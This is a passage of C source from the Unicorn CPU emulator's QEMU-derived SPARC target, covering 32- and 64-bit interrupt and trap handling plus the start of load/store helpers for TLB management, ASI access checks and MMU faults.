VIS_HELPER(name) \ DEF_HELPER_FLAGS_2(f ## name ## 16, TCG_CALL_NO_RWG_SE, \ i64, i64, i64) \ DEF_HELPER_FLAGS_2(f ## name ## 16s, TCG_CALL_NO_RWG_SE, \ i32, i32, i32) \ DEF_HELPER_FLAGS_2(f ## name ## 32, TCG_CALL_NO_RWG_SE, \ i64, i64, i64) \ DEF_HELPER_FLAGS_2(f ## name ## 32s, TCG_CALL_NO_RWG_SE, \ i32, i32, i32) VIS_HELPER(padd) VIS_HELPER(psub) #define VIS_CMPHELPER(name) \ DEF_HELPER_FLAGS_2(f##name##16, TCG_CALL_NO_RWG_SE, \ i64, i64, i64) \ DEF_HELPER_FLAGS_2(f##name##32, TCG_CALL_NO_RWG_SE, \ i64, i64, i64) VIS_CMPHELPER(cmpgt) VIS_CMPHELPER(cmpeq) VIS_CMPHELPER(cmple) VIS_CMPHELPER(cmpne) #endif #undef F_HELPER_0_1 #undef VIS_HELPER #undef VIS_CMPHELPER DEF_HELPER_1(compute_psr, void, env) DEF_HELPER_FLAGS_1(compute_C_icc, TCG_CALL_NO_WG_SE, i32, env) unicorn-2.1.1/qemu/target/sparc/int32_helper.c /* * Sparc32 interrupt helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute 
it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" //#include "sysemu/runstate.h" void sparc_cpu_do_interrupt(CPUState *cs) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; int cwp, intno = cs->exception_index; /* Compute PSR before exposing state. */ if (env->cc_op != CC_OP_FLAGS) { cpu_get_psr(env); } if (env->psret == 0) { if (cs->exception_index == 0x80 && env->def.features & CPU_FEATURE_TA0_SHUTDOWN) { // qemu_system_shutdown_request(SHUTDOWN_CAUSE_GUEST_SHUTDOWN); } else { cpu_abort(cs, "Trap 0x%02x while interrupts disabled, Error state", cs->exception_index); } return; } env->psret = 0; cwp = cpu_cwp_dec(env, env->cwp - 1); cpu_set_cwp(env, cwp); env->regwptr[9] = env->pc; env->regwptr[10] = env->npc; env->psrps = env->psrs; env->psrs = 1; env->tbr = (env->tbr & TBR_BASE_MASK) | (intno << 4); env->pc = env->tbr; env->npc = env->pc + 4; cs->exception_index = -1; /* IRQ acknowledgment */ if ((intno & ~15) == TT_EXTINT && env->qemu_irq_ack != NULL) { env->qemu_irq_ack(env, env->irq_manager, intno); } } static void leon3_cache_control_int(CPUSPARCState *env) { uint32_t state = 0; if (env->cache_control & CACHE_CTRL_IF) { /* Instruction cache state */ state = env->cache_control & CACHE_STATE_MASK; if (state == CACHE_ENABLED) { state = CACHE_FROZEN; } env->cache_control &= ~CACHE_STATE_MASK; env->cache_control |= state; } if (env->cache_control & CACHE_CTRL_DF) { /* Data cache state */ state = (env->cache_control >> 2) & CACHE_STATE_MASK; if (state == CACHE_ENABLED) { state = CACHE_FROZEN; } env->cache_control &= ~(CACHE_STATE_MASK << 2); env->cache_control |= (state << 2); } } void leon3_irq_manager(CPUSPARCState *env, void *irq_manager, int intno) { // leon3_irq_ack(irq_manager, intno); leon3_cache_control_int(env); } unicorn-2.1.1/qemu/target/sparc/int64_helper.c /* * Sparc64 interrupt helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. 
* * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" void sparc_cpu_do_interrupt(CPUState *cs) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; int intno = cs->exception_index; trap_state *tsptr; /* Compute PSR before exposing state. */ if (env->cc_op != CC_OP_FLAGS) { cpu_get_psr(env); } if (env->tl >= env->maxtl) { cpu_abort(cs, "Trap 0x%04x while trap level (%d) >= MAXTL (%d)," " Error state", cs->exception_index, env->tl, env->maxtl); return; } if (env->tl < env->maxtl - 1) { env->tl++; } else { env->pstate |= PS_RED; if (env->tl < env->maxtl) { env->tl++; } } tsptr = cpu_tsptr(env); tsptr->tstate = (cpu_get_ccr(env) << 32) | ((env->asi & 0xff) << 24) | ((env->pstate & 0xf3f) << 8) | cpu_get_cwp64(env); tsptr->tpc = env->pc; tsptr->tnpc = env->npc; tsptr->tt = intno; if (cpu_has_hypervisor(env)) { env->htstate[env->tl] = env->hpstate; /* XXX OpenSPARC T1 - UltraSPARC T3 have MAXPTL=2 but this may change in the future */ if (env->tl > 2) { env->hpstate |= HS_PRIV; } } if (env->def.features & CPU_FEATURE_GL) { tsptr->tstate |= (env->gl & 7ULL) << 40; cpu_gl_switch_gregs(env, env->gl + 1); env->gl++; } switch (intno) { case TT_IVEC: if (!cpu_has_hypervisor(env)) { cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_IG); } break; case TT_TFAULT: case TT_DFAULT: case TT_TMISS: case TT_TMISS + 1: case TT_TMISS + 2: case TT_TMISS + 3: case TT_DMISS: case TT_DMISS + 1: case TT_DMISS + 2: case TT_DMISS + 3: case TT_DPROT: case TT_DPROT + 1: case TT_DPROT + 2: case TT_DPROT + 3: if (cpu_has_hypervisor(env)) { env->hpstate |= HS_PRIV; env->pstate = PS_PEF | PS_PRIV; } else { cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_MG); } break; // case TT_INSN_REAL_TRANSLATION_MISS ... TT_DATA_REAL_TRANSLATION_MISS: // case TT_HTRAP ... TT_HTRAP + 127: // env->hpstate |= HS_PRIV; // break; default: if (intno >= TT_INSN_REAL_TRANSLATION_MISS && intno <= TT_DATA_REAL_TRANSLATION_MISS) { env->hpstate |= HS_PRIV; break; } if (intno >= TT_HTRAP && intno <= TT_HTRAP + 127) { env->hpstate |= HS_PRIV; break; } cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_AG); break; } if (intno == TT_CLRWIN) { cpu_set_cwp(env, cpu_cwp_dec(env, env->cwp - 1)); } else if ((intno & 0x1c0) == TT_SPILL) { cpu_set_cwp(env, cpu_cwp_dec(env, env->cwp - env->cansave - 2)); } else if ((intno & 0x1c0) == TT_FILL) { cpu_set_cwp(env, cpu_cwp_inc(env, env->cwp + 1)); } if (cpu_hypervisor_mode(env)) { env->pc = (env->htba & ~0x3fffULL) | (intno << 5); } else { env->pc = env->tbr & ~0x7fffULL; env->pc |= ((env->tl > 1) ? 
1 << 14 : 0) | (intno << 5); } env->npc = env->pc + 4; cs->exception_index = -1; } trap_state *cpu_tsptr(CPUSPARCState* env) { return &env->ts[env->tl & MAXTL_MASK]; } static bool do_modify_softint(CPUSPARCState *env, uint32_t value) { if (env->softint != value) { env->softint = value; if (cpu_interrupts_enabled(env)) { // cpu_check_irqs(env); } return true; } return false; } void helper_set_softint(CPUSPARCState *env, uint64_t value) { if (do_modify_softint(env, env->softint | (uint32_t)value)) { // trace_int_helper_set_softint(env->softint); } } void helper_clear_softint(CPUSPARCState *env, uint64_t value) { if (do_modify_softint(env, env->softint & (uint32_t)~value)) { // trace_int_helper_clear_softint(env->softint); } } void helper_write_softint(CPUSPARCState *env, uint64_t value) { if (do_modify_softint(env, (uint32_t)value)) { // trace_int_helper_write_softint(env->softint); } } unicorn-2.1.1/qemu/target/sparc/ldst_helper.c /* * Helpers for loads and stores * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "tcg/tcg.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "asi.h" //#define DEBUG_MMU //#define DEBUG_MXCC //#define DEBUG_UNALIGNED //#define DEBUG_UNASSIGNED //#define DEBUG_ASI //#define DEBUG_CACHE_CONTROL #ifdef DEBUG_MMU #define DPRINTF_MMU(fmt, ...) \ do { printf("MMU: " fmt , ## __VA_ARGS__); } while (0) #else #define DPRINTF_MMU(fmt, ...) do {} while (0) #endif #ifdef DEBUG_MXCC #define DPRINTF_MXCC(fmt, ...) \ do { printf("MXCC: " fmt , ## __VA_ARGS__); } while (0) #else #define DPRINTF_MXCC(fmt, ...) do {} while (0) #endif #ifdef DEBUG_ASI #define DPRINTF_ASI(fmt, ...) \ do { printf("ASI: " fmt , ## __VA_ARGS__); } while (0) #endif #ifdef DEBUG_CACHE_CONTROL #define DPRINTF_CACHE_CONTROL(fmt, ...) \ do { printf("CACHE_CONTROL: " fmt , ## __VA_ARGS__); } while (0) #else #define DPRINTF_CACHE_CONTROL(fmt, ...) 
do {} while (0) #endif #ifdef TARGET_SPARC64 #ifndef TARGET_ABI32 #define AM_CHECK(env1) ((env1)->pstate & PS_AM) #else #define AM_CHECK(env1) (1) #endif #endif #define QT0 (env->qt0) #define QT1 (env->qt1) #if defined(TARGET_SPARC64) /* Calculates TSB pointer value for fault page size * UltraSPARC IIi has fixed sizes (8k or 64k) for the page pointers * UA2005 holds the page size configuration in mmu_ctx registers */ static uint64_t ultrasparc_tsb_pointer(CPUSPARCState *env, const SparcV9MMU *mmu, const int idx) { uint64_t tsb_register; int page_size; if (cpu_has_hypervisor(env)) { int tsb_index = 0; int ctx = mmu->tag_access & 0x1fffULL; uint64_t ctx_register = mmu->sun4v_ctx_config[ctx ? 1 : 0]; tsb_index = idx; tsb_index |= ctx ? 2 : 0; page_size = idx ? ctx_register >> 8 : ctx_register; page_size &= 7; tsb_register = mmu->sun4v_tsb_pointers[tsb_index]; } else { page_size = idx; tsb_register = mmu->tsb; } int tsb_split = (tsb_register & 0x1000ULL) ? 1 : 0; int tsb_size = tsb_register & 0xf; uint64_t tsb_base_mask = (~0x1fffULL) << tsb_size; /* move va bits to correct position, * the context bits will be masked out later */ uint64_t va = mmu->tag_access >> (3 * page_size + 9); /* calculate tsb_base mask and adjust va if split is in use */ if (tsb_split) { if (idx == 0) { va &= ~(1ULL << (13 + tsb_size)); } else { va |= (1ULL << (13 + tsb_size)); } tsb_base_mask <<= 1; } return ((tsb_register & tsb_base_mask) | (va & ~tsb_base_mask)) & ~0xfULL; } /* Calculates tag target register value by reordering bits in tag access register */ static uint64_t ultrasparc_tag_target(uint64_t tag_access_register) { return ((tag_access_register & 0x1fff) << 48) | (tag_access_register >> 22); } static void replace_tlb_entry(SparcTLBEntry *tlb, uint64_t tlb_tag, uint64_t tlb_tte, CPUSPARCState *env) { target_ulong mask, size, va, offset; /* flush page range if translation is valid */ if (TTE_IS_VALID(tlb->tte)) { CPUState *cs = env_cpu(env); size = 8192ULL << 3 * TTE_PGSIZE(tlb->tte); mask = 1ULL + ~size; va = tlb->tag & mask; for (offset = 0; offset < size; offset += TARGET_PAGE_SIZE) { tlb_flush_page(cs, va + offset); } } tlb->tag = tlb_tag; tlb->tte = tlb_tte; } static void demap_tlb(SparcTLBEntry *tlb, target_ulong demap_addr, const char *strmmu, CPUSPARCState *env1) { unsigned int i; target_ulong mask; uint64_t context; int is_demap_context = (demap_addr >> 6) & 1; /* demap context */ switch ((demap_addr >> 4) & 3) { case 0: /* primary */ context = env1->dmmu.mmu_primary_context; break; case 1: /* secondary */ context = env1->dmmu.mmu_secondary_context; break; case 2: /* nucleus */ context = 0; break; case 3: /* reserved */ default: return; } for (i = 0; i < 64; i++) { if (TTE_IS_VALID(tlb[i].tte)) { if (is_demap_context) { /* will remove non-global entries matching context value */ if (TTE_IS_GLOBAL(tlb[i].tte) || !tlb_compare_context(&tlb[i], context)) { continue; } } else { /* demap page will remove any entry matching VA */ mask = 0xffffffffffffe000ULL; mask <<= 3 * ((tlb[i].tte >> 61) & 3); if (!compare_masked(demap_addr, tlb[i].tag, mask)) { continue; } /* entry should be global or matching context value */ if (!TTE_IS_GLOBAL(tlb[i].tte) && !tlb_compare_context(&tlb[i], context)) { continue; } } replace_tlb_entry(&tlb[i], 0, 0, env1); #ifdef DEBUG_MMU DPRINTF_MMU("%s demap invalidated entry [%02u]\n", strmmu, i); dump_mmu(env1); #endif } } } static uint64_t sun4v_tte_to_sun4u(CPUSPARCState *env, uint64_t tag, uint64_t sun4v_tte) { uint64_t sun4u_tte; if (!(cpu_has_hypervisor(env) && (tag & 
TLB_UST1_IS_SUN4V_BIT))) { /* is already in the sun4u format */ return sun4v_tte; } sun4u_tte = TTE_PA(sun4v_tte) | (sun4v_tte & TTE_VALID_BIT); sun4u_tte |= (sun4v_tte & 3ULL) << 61; /* TTE_PGSIZE */ sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_NFO_BIT_UA2005, TTE_NFO_BIT); sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_USED_BIT_UA2005, TTE_USED_BIT); sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_W_OK_BIT_UA2005, TTE_W_OK_BIT); sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_SIDEEFFECT_BIT_UA2005, TTE_SIDEEFFECT_BIT); sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_PRIV_BIT_UA2005, TTE_PRIV_BIT); sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_LOCKED_BIT_UA2005, TTE_LOCKED_BIT); return sun4u_tte; } static void replace_tlb_1bit_lru(SparcTLBEntry *tlb, uint64_t tlb_tag, uint64_t tlb_tte, const char *strmmu, CPUSPARCState *env1, uint64_t addr) { unsigned int i, replace_used; tlb_tte = sun4v_tte_to_sun4u(env1, addr, tlb_tte); if (cpu_has_hypervisor(env1)) { uint64_t new_vaddr = tlb_tag & ~0x1fffULL; uint64_t new_size = 8192ULL << 3 * TTE_PGSIZE(tlb_tte); uint32_t new_ctx = tlb_tag & 0x1fffU; for (i = 0; i < 64; i++) { uint32_t ctx = tlb[i].tag & 0x1fffU; /* check if new mapping overlaps an existing one */ if (new_ctx == ctx) { uint64_t vaddr = tlb[i].tag & ~0x1fffULL; uint64_t size = 8192ULL << 3 * TTE_PGSIZE(tlb[i].tte); if (new_vaddr == vaddr || (new_vaddr < vaddr + size && vaddr < new_vaddr + new_size)) { DPRINTF_MMU("auto demap entry [%d] %lx->%lx\n", i, vaddr, new_vaddr); replace_tlb_entry(&tlb[i], tlb_tag, tlb_tte, env1); return; } } } } /* Try replacing invalid entry */ for (i = 0; i < 64; i++) { if (!TTE_IS_VALID(tlb[i].tte)) { replace_tlb_entry(&tlb[i], tlb_tag, tlb_tte, env1); #ifdef DEBUG_MMU DPRINTF_MMU("%s lru replaced invalid entry [%i]\n", strmmu, i); dump_mmu(env1); #endif return; } } /* All entries are valid, try replacing unlocked entry */ for (replace_used = 0; replace_used < 2; ++replace_used) { /* Used entries are not replaced on first pass */ for (i = 0; i < 64; i++) { if (!TTE_IS_LOCKED(tlb[i].tte) && !TTE_IS_USED(tlb[i].tte)) { replace_tlb_entry(&tlb[i], tlb_tag, tlb_tte, env1); #ifdef DEBUG_MMU DPRINTF_MMU("%s lru replaced unlocked %s entry [%i]\n", strmmu, (replace_used ? 
"used" : "unused"), i); dump_mmu(env1); #endif return; } } /* Now reset used bit and search for unused entries again */ for (i = 0; i < 64; i++) { TTE_SET_UNUSED(tlb[i].tte); } } #ifdef DEBUG_MMU DPRINTF_MMU("%s lru replacement: no free entries available, " "replacing the last one\n", strmmu); #endif /* corner case: the last entry is replaced anyway */ replace_tlb_entry(&tlb[63], tlb_tag, tlb_tte, env1); } #endif #ifdef TARGET_SPARC64 /* returns true if access using this ASI is to have address translated by MMU otherwise access is to raw physical address */ /* TODO: check sparc32 bits */ static inline int is_translating_asi(int asi) { /* Ultrasparc IIi translating asi - note this list is defined by cpu implementation */ #define XRANGE(x, a, b) (x >=a && x <= b) if (XRANGE(asi, 0x04, 0x11)) return 1; if (XRANGE(asi, 0x16, 0x19)) return 1; if (XRANGE(asi, 0x1E, 0x1F)) return 1; if (XRANGE(asi, 0x24, 0x2C)) return 1; if (XRANGE(asi, 0x70, 0x73)) return 1; if (XRANGE(asi, 0x78, 0x79)) return 1; if (XRANGE(asi, 0x80, 0xFF)) return 1; #undef XRANGE return 0; } static inline target_ulong address_mask(CPUSPARCState *env1, target_ulong addr) { if (AM_CHECK(env1)) { addr &= 0xffffffffULL; } return addr; } static inline target_ulong asi_address_mask(CPUSPARCState *env, int asi, target_ulong addr) { if (is_translating_asi(asi)) { addr = address_mask(env, addr); } return addr; } static inline void do_check_asi(CPUSPARCState *env, int asi, uintptr_t ra) { /* ASIs >= 0x80 are user mode. * ASIs >= 0x30 are hyper mode (or super if hyper is not available). * ASIs <= 0x2f are super mode. */ if (asi < 0x80 && !cpu_hypervisor_mode(env) && (!cpu_supervisor_mode(env) || (asi >= 0x30 && cpu_has_hypervisor(env)))) { cpu_raise_exception_ra(env, TT_PRIV_ACT, ra); } } #endif static void do_check_align(CPUSPARCState *env, target_ulong addr, uint32_t align, uintptr_t ra) { if (addr & align) { #ifdef DEBUG_UNALIGNED printf("Unaligned access to 0x" TARGET_FMT_lx " from 0x" TARGET_FMT_lx "\n", addr, env->pc); #endif cpu_raise_exception_ra(env, TT_UNALIGNED, ra); } } void helper_check_align(CPUSPARCState *env, target_ulong addr, uint32_t align) { do_check_align(env, addr, align, GETPC()); } #if !defined(TARGET_SPARC64) && defined(DEBUG_MXCC) static void dump_mxcc(CPUSPARCState *env) { printf("mxccdata: %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 "\n", env->mxccdata[0], env->mxccdata[1], env->mxccdata[2], env->mxccdata[3]); printf("mxccregs: %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 "\n" " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 "\n", env->mxccregs[0], env->mxccregs[1], env->mxccregs[2], env->mxccregs[3], env->mxccregs[4], env->mxccregs[5], env->mxccregs[6], env->mxccregs[7]); } #endif #if defined(TARGET_SPARC64) && defined(DEBUG_ASI) static void dump_asi(const char *txt, target_ulong addr, int asi, int size, uint64_t r1) { switch (size) { case 1: DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %02" PRIx64 "\n", txt, addr, asi, r1 & 0xff); break; case 2: DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %04" PRIx64 "\n", txt, addr, asi, r1 & 0xffff); break; case 4: DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %08" PRIx64 "\n", txt, addr, asi, r1 & 0xffffffff); break; case 8: DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %016" PRIx64 "\n", txt, addr, asi, r1); break; } } #endif #ifndef TARGET_SPARC64 static void sparc_raise_mmu_fault(CPUState *cs, hwaddr addr, bool is_write, bool is_exec, int is_asi, unsigned size, uintptr_t retaddr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState 
*env = &cpu->env; int fault_type; #ifdef DEBUG_UNASSIGNED if (is_asi) { printf("Unassigned mem %s access of %d byte%s to " TARGET_FMT_plx " asi 0x%02x from " TARGET_FMT_lx "\n", is_exec ? "exec" : is_write ? "write" : "read", size, size == 1 ? "" : "s", addr, is_asi, env->pc); } else { printf("Unassigned mem %s access of %d byte%s to " TARGET_FMT_plx " from " TARGET_FMT_lx "\n", is_exec ? "exec" : is_write ? "write" : "read", size, size == 1 ? "" : "s", addr, env->pc); } #endif /* Don't overwrite translation and access faults */ fault_type = (env->mmuregs[3] & 0x1c) >> 2; if ((fault_type > 4) || (fault_type == 0)) { env->mmuregs[3] = 0; /* Fault status register */ if (is_asi) { env->mmuregs[3] |= 1 << 16; } if (env->psrs) { env->mmuregs[3] |= 1 << 5; } if (is_exec) { env->mmuregs[3] |= 1 << 6; } if (is_write) { env->mmuregs[3] |= 1 << 7; } env->mmuregs[3] |= (5 << 2) | 2; /* SuperSPARC will never place instruction fault addresses in the FAR */ if (!is_exec) { env->mmuregs[4] = addr; /* Fault address register */ } } /* overflow (same type fault was not read before another fault) */ if (fault_type == ((env->mmuregs[3] & 0x1c)) >> 2) { env->mmuregs[3] |= 1; } if ((env->mmuregs[0] & MMU_E) && !(env->mmuregs[0] & MMU_NF)) { int tt = is_exec ? TT_CODE_ACCESS : TT_DATA_ACCESS; cpu_raise_exception_ra(env, tt, retaddr); } /* * flush neverland mappings created during no-fault mode, * so the sequential MMU faults report proper fault types */ if (env->mmuregs[0] & MMU_NF) { tlb_flush(cs); } } #else static void sparc_raise_mmu_fault(CPUState *cs, hwaddr addr, bool is_write, bool is_exec, int is_asi, unsigned size, uintptr_t retaddr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; #ifdef DEBUG_UNASSIGNED printf("Unassigned mem access to " TARGET_FMT_plx " from " TARGET_FMT_lx "\n", addr, env->pc); #endif if (is_exec) { /* XXX has_hypervisor */ if (env->lsu & (IMMU_E)) { cpu_raise_exception_ra(env, TT_CODE_ACCESS, retaddr); } else if (cpu_has_hypervisor(env) && !(env->hpstate & HS_PRIV)) { cpu_raise_exception_ra(env, TT_INSN_REAL_TRANSLATION_MISS, retaddr); } } else { if (env->lsu & (DMMU_E)) { cpu_raise_exception_ra(env, TT_DATA_ACCESS, retaddr); } else if (cpu_has_hypervisor(env) && !(env->hpstate & HS_PRIV)) { cpu_raise_exception_ra(env, TT_DATA_REAL_TRANSLATION_MISS, retaddr); } } } #endif #ifndef TARGET_SPARC64 /* Leon3 cache control */ static void leon3_cache_control_st(CPUSPARCState *env, target_ulong addr, uint64_t val, int size) { DPRINTF_CACHE_CONTROL("st addr:%08x, val:%" PRIx64 ", size:%d\n", addr, val, size); if (size != 4) { DPRINTF_CACHE_CONTROL("32bits only\n"); return; } switch (addr) { case 0x00: /* Cache control */ /* These values must always be read as zeros */ val &= ~CACHE_CTRL_FD; val &= ~CACHE_CTRL_FI; val &= ~CACHE_CTRL_IB; val &= ~CACHE_CTRL_IP; val &= ~CACHE_CTRL_DP; env->cache_control = val; break; case 0x04: /* Instruction cache configuration */ case 0x08: /* Data cache configuration */ /* Read Only */ break; default: DPRINTF_CACHE_CONTROL("write unknown register %08x\n", addr); break; }; } static uint64_t leon3_cache_control_ld(CPUSPARCState *env, target_ulong addr, int size) { uint64_t ret = 0; if (size != 4) { DPRINTF_CACHE_CONTROL("32bits only\n"); return 0; } switch (addr) { case 0x00: /* Cache control */ ret = env->cache_control; break; /* Configuration registers are read and only always keep those predefined values */ case 0x04: /* Instruction cache configuration */ ret = 0x10220000; break; case 0x08: /* Data cache configuration */ ret = 0x18220000; 
break; default: DPRINTF_CACHE_CONTROL("read unknown register %08x\n", addr); break; }; DPRINTF_CACHE_CONTROL("ld addr:%08x, ret:0x%" PRIx64 ", size:%d\n", addr, ret, size); return ret; } uint64_t helper_ld_asi(CPUSPARCState *env, target_ulong addr, int asi, uint32_t memop) { int size = 1 << (memop & MO_SIZE); int sign = memop & MO_SIGN; CPUState *cs = env_cpu(env); uint64_t ret = 0; #if defined(DEBUG_MXCC) || defined(DEBUG_ASI) uint32_t last_addr = addr; #endif do_check_align(env, addr, size - 1, GETPC()); switch (asi) { case ASI_M_MXCC: /* SuperSparc MXCC registers, or... */ /* case ASI_LEON_CACHEREGS: Leon3 cache control */ switch (addr) { case 0x00: /* Leon3 Cache Control */ case 0x08: /* Leon3 Instruction Cache config */ case 0x0C: /* Leon3 Date Cache config */ if (env->def.features & CPU_FEATURE_CACHE_CTRL) { ret = leon3_cache_control_ld(env, addr, size); } break; case 0x01c00a00: /* MXCC control register */ if (size == 8) { ret = env->mxccregs[3]; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00a04: /* MXCC control register */ if (size == 4) { ret = env->mxccregs[3]; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00c00: /* Module reset register */ if (size == 8) { ret = env->mxccregs[5]; /* should we do something here? */ } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00f00: /* MBus port address register */ if (size == 8) { ret = env->mxccregs[7]; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; default: qemu_log_mask(LOG_UNIMP, "%08x: unimplemented address, size: %d\n", addr, size); break; } DPRINTF_MXCC("asi = %d, size = %d, sign = %d, " "addr = %08x -> ret = %" PRIx64 "," "addr = %08x\n", asi, size, sign, last_addr, ret, addr); #ifdef DEBUG_MXCC dump_mxcc(env); #endif break; case ASI_M_FLUSH_PROBE: /* SuperSparc MMU probe */ case ASI_LEON_MMUFLUSH: /* LEON3 MMU probe */ { int mmulev; mmulev = (addr >> 8) & 15; if (mmulev > 4) { ret = 0; } else { ret = mmu_probe(env, addr, mmulev); } DPRINTF_MMU("mmu_probe: 0x%08x (lev %d) -> 0x%08" PRIx64 "\n", addr, mmulev, ret); } break; case ASI_M_MMUREGS: /* SuperSparc MMU regs */ case ASI_LEON_MMUREGS: /* LEON3 MMU regs */ { int reg = (addr >> 8) & 0x1f; ret = env->mmuregs[reg]; if (reg == 3) { /* Fault status cleared on read */ env->mmuregs[3] = 0; } else if (reg == 0x13) { /* Fault status read */ ret = env->mmuregs[3]; } else if (reg == 0x14) { /* Fault address read */ ret = env->mmuregs[4]; } DPRINTF_MMU("mmu_read: reg[%d] = 0x%08" PRIx64 "\n", reg, ret); } break; case ASI_M_TLBDIAG: /* Turbosparc ITLB Diagnostic */ case ASI_M_DIAGS: /* Turbosparc DTLB Diagnostic */ case ASI_M_IODIAG: /* Turbosparc IOTLB Diagnostic */ break; case ASI_KERNELTXT: /* Supervisor code access */ switch (size) { case 1: ret = cpu_ldub_code(env, addr); break; case 2: ret = cpu_lduw_code(env, addr); break; default: case 4: ret = cpu_ldl_code(env, addr); break; case 8: ret = cpu_ldq_code(env, addr); break; } break; case ASI_M_TXTC_TAG: /* SparcStation 5 I-cache tag */ case ASI_M_TXTC_DATA: /* SparcStation 5 I-cache data */ case ASI_M_DATAC_TAG: /* SparcStation 5 D-cache tag */ case ASI_M_DATAC_DATA: /* SparcStation 5 D-cache data */ break; case 0x21: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x22: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x23: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x24: /* MMU 
passthrough, 0x100000000 to 0xfffffffff */ case 0x25: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x26: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x27: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x28: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x29: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2a: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2b: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2c: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2d: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2e: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2f: /* MMU passthrough, 0x100000000 to 0xfffffffff */ { MemTxResult result; hwaddr access_addr = (hwaddr)addr | ((hwaddr)(asi & 0xf) << 32); switch (size) { case 1: ret = glue(address_space_ldub, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, MEMTXATTRS_UNSPECIFIED, &result); break; case 2: ret = glue(address_space_lduw, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, MEMTXATTRS_UNSPECIFIED, &result); break; default: case 4: ret = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, MEMTXATTRS_UNSPECIFIED, &result); break; case 8: ret = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, MEMTXATTRS_UNSPECIFIED, &result); break; } if (result != MEMTX_OK) { sparc_raise_mmu_fault(cs, access_addr, false, false, false, size, GETPC()); } break; } case 0x30: /* Turbosparc secondary cache diagnostic */ case 0x31: /* Turbosparc RAM snoop */ case 0x32: /* Turbosparc page table descriptor diagnostic */ case 0x39: /* data cache diagnostic register */ ret = 0; break; case 0x38: /* SuperSPARC MMU Breakpoint Control Registers */ { int reg = (addr >> 8) & 3; switch (reg) { case 0: /* Breakpoint Value (Addr) */ ret = env->mmubpregs[reg]; break; case 1: /* Breakpoint Mask */ ret = env->mmubpregs[reg]; break; case 2: /* Breakpoint Control */ ret = env->mmubpregs[reg]; break; case 3: /* Breakpoint Status */ ret = env->mmubpregs[reg]; env->mmubpregs[reg] = 0ULL; break; } DPRINTF_MMU("read breakpoint reg[%d] 0x%016" PRIx64 "\n", reg, ret); } break; case 0x49: /* SuperSPARC MMU Counter Breakpoint Value */ ret = env->mmubpctrv; break; case 